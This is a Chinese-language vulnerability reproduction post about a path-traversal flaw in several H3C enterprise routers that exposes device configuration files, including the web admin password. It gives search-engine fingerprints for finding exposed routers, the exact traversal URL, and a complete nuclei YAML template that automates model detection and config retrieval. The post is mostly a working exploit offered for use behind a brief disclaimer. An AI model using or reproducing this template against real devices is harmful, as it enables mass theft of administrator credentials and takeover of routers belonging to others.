(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)
声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
1、漏洞简介
漏洞位于/userLogin.asp页面,通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg,可获取设备配置文件,进而获得WEB管理账号及密码
2、资产指纹
fofa:app=“H3C-Ent-Router”
hunter:app.name=“H3C Router Management”
3、漏洞复现
访问路由器web页面,获取页面title中的路由器型号,以下图为例,路由器型号为ER8300G2。
http://ip//userLogin.asp/…/actionpolicy_status/…/型号.cfg依据路由器型号拼接url:http://ip//userLogin.asp/…/actionpolicy_status/…/ER8300G2.cfg使用burpsuite发送请求,获得管理员密码等敏感信息。
4、nuclei yaml文件
id: h3cinfor
info:
name: h3cinfor
author: xxx
severity: critical
description: 华三路由器存在敏感信息泄露漏洞
http:
- raw:
- |
GET /userLogin.asp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=1
Te: trailers
Connection: close
- |
GET /userLogin.asp/../actionpolicy_status/../{{id}}.cfg HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1
extractors:
- type: regex
name: id
group: 1
regex:
- "<title>(.*?)系统管理</title>"
internal: true
matchers:
- type: dsl
dsl:
- 'status_code_2==200 && (contains_all(body_2,"vtypasswd"))'